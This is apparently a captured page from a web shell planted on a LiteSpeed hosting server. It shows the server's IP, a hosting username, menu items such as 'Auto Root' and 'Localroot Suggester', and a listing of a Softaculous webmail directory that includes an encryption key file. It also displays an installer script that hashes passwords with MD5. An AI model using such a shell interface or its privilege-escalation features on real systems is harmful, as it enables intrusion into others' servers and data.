Linux thaedus.aserv.co.za 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 197.242.159.149 & Your IP : 216.73.216.114
Domains :
Cant Read [ /etc/named.conf ]
User : bigpuxtb
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
webmail /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-07-14 03:28
php53
[ DIR ]
drwxr-xr-x
2026-07-14 03:28
php56
[ DIR ]
drwxr-xr-x
2026-07-14 03:28
php71
[ DIR ]
drwxr-xr-x
2026-07-14 03:28
php81
[ DIR ]
drwxr-xr-x
2026-07-14 03:28
php82
[ DIR ]
drwxr-xr-x
2026-07-14 03:28
Core.config.json
4.57
KB
-rw-r--r--
2026-06-19 02:19
_edit.php
3.58
KB
-rw-r--r--
2021-12-23 04:54
_edit.xml
433
B
-rw-r--r--
2021-12-23 04:54
_extend.php
1.51
KB
-rw-r--r--
2021-12-23 04:54
changelog.txt
2.35
KB
-rw-r--r--
2026-04-02 04:59
clone.php
5
KB
-rw-r--r--
2026-06-19 04:01
config.json
7.27
KB
-rw-r--r--
2026-06-19 02:19
db_init.php
619
B
-rw-r--r--
2021-12-23 04:54
encryption_key.php
8
B
-rw-r--r--
2024-09-19 04:58
fileindex.php
188
B
-rw-r--r--
2025-10-23 02:51
import.php
3.85
KB
-rw-r--r--
2026-06-19 04:01
info.xml
3.88
KB
-rw-r--r--
2026-06-19 02:19
install.js
2.13
KB
-rw-r--r--
2026-04-13 04:21
install.php
6.08
KB
-rw-r--r--
2026-06-19 04:01
install.xml
3.58
KB
-rw-r--r--
2021-12-23 04:54
md5
4.05
KB
-rw-r--r--
2026-06-19 04:01
migrate.php
1.28
KB
-rw-r--r--
2021-12-23 04:54
notes.txt
1.57
KB
-rw-r--r--
2025-07-04 05:00
upgrade.php
5.73
KB
-rw-r--r--
2026-06-19 04:01
upgrade.xml
627
B
-rw-r--r--
2024-09-19 04:58
webmail.sql
43.28
KB
-rw-r--r--
2026-06-19 02:19
webmail.zip
67.24
MB
-rw-r--r--
2026-06-19 02:19
Save
Rename
<?php ////////////////////////////////////////////////////////////// //=========================================================== // extend.php(For individual softwares) //=========================================================== // SOFTACULOUS // Version : 1.0 // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Alons // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: http://www.softaculous.com/ (SOFTACULOUS) // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- //=========================================================== // (c)Softaculous Inc. //=========================================================== ////////////////////////////////////////////////////////////// if(!defined('SOFTACULOUS')){ die('Hacking Attempt'); } ///////////////////////////////////////// // All functions in this PAGE must begin // with TWO UNDERSCORE '__' to avoid // clashes with SOFTACULOUS Functions // e.g. __softname_funcname() ///////////////////////////////////////// ////////////////////////////////////////// // Note : The path of the upgrade package // is $software['path'].'/' . So to // access other files use // $software['path'].'/other_file.ext' ////////////////////////////////////////// //Change password using old method function __ad_pass_md5($password){ return md5($password); } ?>